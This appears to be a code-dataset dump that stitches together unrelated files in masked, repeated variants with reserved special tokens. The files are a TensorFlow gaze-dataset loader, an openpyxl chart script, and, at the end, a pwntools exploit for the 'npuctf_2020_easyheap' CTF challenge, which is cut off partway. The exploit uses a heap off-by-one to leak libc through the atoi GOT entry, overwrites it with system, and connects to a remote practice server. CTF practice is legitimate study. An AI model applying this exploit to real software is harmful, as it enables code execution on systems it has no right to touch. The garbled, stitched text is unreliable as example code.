self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError(
'In dataset.py: default input not specified for this model!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GeneratorVGGNet:
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(
key) + '/head'], hf[str(key) + '/gaze']):
yield f, g, z
else:
for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +
'/head']):
yield f, g
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError(
'In dataset.py: default input not specified for this model!')
<|reserved_special_token_1|>
import tensorflow as tf
import tensorflow_io as tfio
import h5py
class GeneratorVGGNet:
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(
key) + '/head'], hf[str(key) + '/gaze']):
yield f, g, z
else:
for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +
'/head']):
yield f, g
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError(
'In dataset.py: default input not specified for this model!')
<|reserved_special_token_1|>
import tensorflow as tf
import tensorflow_io as tfio
import h5py
class GeneratorVGGNet():
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + "/left-eye"], hf[str(key) + "/head"], hf[str(key) + "/gaze"]) :
yield (f, g, z)
else:
for f, g in zip(hf[str(key) + "/left-eye"], hf[str(key) + "/head"]) :
yield (f, g)
class Dataset():
def __init__(self, config, path, batch_size, shuffle, is_training, is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
# if (self.config['model'] == 'vggnet'):
# if is_training or is_testing:
# self.data = tf.data.Dataset.from_generator(
# GeneratorVGGNet(),
# output_types = (tf.uint8, tf.float32, tf.float32),
# output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2]), tf.TensorShape([2])),
# args=(self.path, False)
# )
# else:
# self.data = tf.data.Dataset.from_generator(
# GeneratorVGGNet(),
# output_types = (tf.uint8, tf.float32),
# output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2])),
# args=(self.path, True)
# )
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/gaze', spec=tf.float64)
# for key in keys[1:]:
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/left-eye', spec=tf.uint8)
# self.left_eye = self.left_eye.concatenate(temp)
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/head', spec=tf.float64)
# self.head = self.head.concatenate(temp)
# if is_training or is_testing:
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/gaze', spec=tf.float64)
# self.gaze = self.gaze.concatenate(temp)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError('In dataset.py: default input not specified for this model!')
|
flexible
|
{
"blob_id": "f94fcf6ed54f247093050216c0c331ce188da919",
"index": 9228,
"step-1": "<mask token>\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass GeneratorVGGNet:\n <mask token>\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError(\n 'In dataset.py: default input not specified for this model!')\n",
"step-3": "<mask token>\n\n\nclass GeneratorVGGNet:\n\n def __call__(self, filename, is_test):\n with h5py.File(filename, 'r') as hf:\n keys = list(hf.keys())\n for key in keys:\n if not is_test:\n for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(\n key) + '/head'], hf[str(key) + '/gaze']):\n yield f, g, z\n else:\n for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +\n '/head']):\n yield f, g\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError(\n 'In dataset.py: default input not specified for this model!')\n",
"step-4": "import tensorflow as tf\nimport tensorflow_io as tfio\nimport h5py\n\n\nclass GeneratorVGGNet:\n\n def __call__(self, filename, is_test):\n with h5py.File(filename, 'r') as hf:\n keys = list(hf.keys())\n for key in keys:\n if not is_test:\n for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(\n key) + '/head'], hf[str(key) + '/gaze']):\n yield f, g, z\n else:\n for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +\n '/head']):\n yield f, g\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError(\n 'In dataset.py: default input not specified for this model!')\n",
"step-5": "import tensorflow as tf\nimport tensorflow_io as tfio\n\nimport h5py\n\nclass GeneratorVGGNet():\n def __call__(self, filename, is_test):\n with h5py.File(filename, 'r') as hf:\n keys = list(hf.keys())\n for key in keys:\n if not is_test:\n for f, g, z in zip(hf[str(key) + \"/left-eye\"], hf[str(key) + \"/head\"], hf[str(key) + \"/gaze\"]) :\n yield (f, g, z)\n else: \n for f, g in zip(hf[str(key) + \"/left-eye\"], hf[str(key) + \"/head\"]) :\n yield (f, g)\n\n\nclass Dataset():\n \n def __init__(self, config, path, batch_size, shuffle, is_training, is_testing):\n self.config = config\n\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n \n # if (self.config['model'] == 'vggnet'):\n # if is_training or is_testing:\n # self.data = tf.data.Dataset.from_generator(\n # GeneratorVGGNet(),\n # output_types = (tf.uint8, tf.float32, tf.float32),\n # output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2]), tf.TensorShape([2])),\n # args=(self.path, False)\n # )\n # else:\n # self.data = tf.data.Dataset.from_generator(\n # GeneratorVGGNet(),\n # output_types = (tf.uint8, tf.float32),\n # output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2])),\n # args=(self.path, True)\n # ) \n\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n \n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/gaze', spec=tf.float64)\n\n # for key in keys[1:]:\n # temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/left-eye', spec=tf.uint8)\n # self.left_eye = self.left_eye.concatenate(temp)\n # temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/head', spec=tf.float64)\n # self.head = self.head.concatenate(temp)\n # if is_training or is_testing:\n # temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/gaze', spec=tf.float64)\n # self.gaze = self.gaze.concatenate(temp)\n\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self.gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n\n\n\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError('In dataset.py: default input not specified for this model!')\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n \n \n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import openpyxl
from openpyxl import Workbook
import openpyxl as openpyxl
from openpyxl.chart import BarChart
wb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')
sheet = wb['stu_scores_01']
data = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,max_col=7)
cat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)
seriesObj = openpyxl.chart.Series(data, title="bar chart of each subject", title_from_data=True)
charObj = openpyxl.chart.BarChart()
charObj.title = "My Bar Chart"
charObj.x_axis.title = 'bar chart of each subject'
charObj.append(seriesObj)
charObj.set_categories(cat)
sheet.add_chart(charObj,"I2")
#new one
data = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,max_col=7)
cat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)
seriesObj = openpyxl.chart.Series(data, title="bar chart of boys each subject", title_from_data=True)
charObj = openpyxl.chart.BarChart()
charObj.title = "My Bar Chart"
charObj.x_axis.title = 'Boys each subject'
charObj.append(seriesObj)
charObj.set_categories(cat)
sheet.add_chart(charObj,"I18")
data = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,max_col=7)
cat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)
seriesObj = openpyxl.chart.Series(data, title="bar chart of girls each subject", title_from_data=True)
charObj = openpyxl.chart.BarChart()
charObj.title = "My Bar Chart"
charObj.x_axis.title = 'girls each subject'
charObj.append(seriesObj)
charObj.set_categories(cat)
sheet.add_chart(charObj,"Q2")
wb.save('stu_scores _Grade.xlsx')
wb.close()
|
normal
|
{
"blob_id": "bb9ff561ff94bbe4d20f14287ba313386ea78609",
"index": 9121,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I2')\n<mask token>\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I18')\n<mask token>\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'Q2')\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-3": "<mask token>\nwb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')\nsheet = wb['stu_scores_01']\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title='bar chart of each subject',\n title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'bar chart of each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I2')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of boys each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'Boys each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I18')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of girls each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'girls each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'Q2')\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-4": "import openpyxl\nfrom openpyxl import Workbook\nimport openpyxl as openpyxl\nfrom openpyxl.chart import BarChart\nwb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')\nsheet = wb['stu_scores_01']\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title='bar chart of each subject',\n title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'bar chart of each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I2')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of boys each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'Boys each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I18')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of girls each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'girls each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'Q2')\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-5": "import openpyxl\nfrom openpyxl import Workbook\nimport openpyxl as openpyxl\nfrom openpyxl.chart import BarChart\n\nwb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')\nsheet = wb['stu_scores_01']\n\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)\n\nseriesObj = openpyxl.chart.Series(data, title=\"bar chart of each subject\", title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = \"My Bar Chart\"\ncharObj.x_axis.title = 'bar chart of each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj,\"I2\")\n#new one\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)\n\nseriesObj = openpyxl.chart.Series(data, title=\"bar chart of boys each subject\", title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = \"My Bar Chart\"\ncharObj.x_axis.title = 'Boys each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj,\"I18\")\n\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)\n\nseriesObj = openpyxl.chart.Series(data, title=\"bar chart of girls each subject\", title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = \"My Bar Chart\"\ncharObj.x_axis.title = 'girls each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj,\"Q2\")\n\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
<|reserved_special_token_0|>
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
def show(index):
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Index :', str(index))
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
<|reserved_special_token_0|>
add(24, 'A' * 8)
add(24, 'B' * 8)
edit(0, 'A' * 24 + 'A')
delete(1)
add(56, 'A' * 8)
<|reserved_special_token_0|>
payload += p64(56) + p64(elf.got['atoi'])
edit(1, payload)
show(1)
sh.recvuntil('Content : ')
<|reserved_special_token_0|>
show_addr('libc_addr', libc_addr)
show_addr('system_addr', system_addr)
edit(1, p64(system_addr))
sh.interactive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
def show(index):
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Index :', str(index))
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn', 27634)
add(24, 'A' * 8)
add(24, 'B' * 8)
edit(0, 'A' * 24 + 'A')
delete(1)
add(56, 'A' * 8)
payload = 'A' * 16 + p64(0) + p64(33)
payload += p64(56) + p64(elf.got['atoi'])
edit(1, payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8, '\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr', libc_addr)
show_addr('system_addr', system_addr)
edit(1, p64(system_addr))
sh.interactive()
<|reserved_special_token_1|>
from pwn import *
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
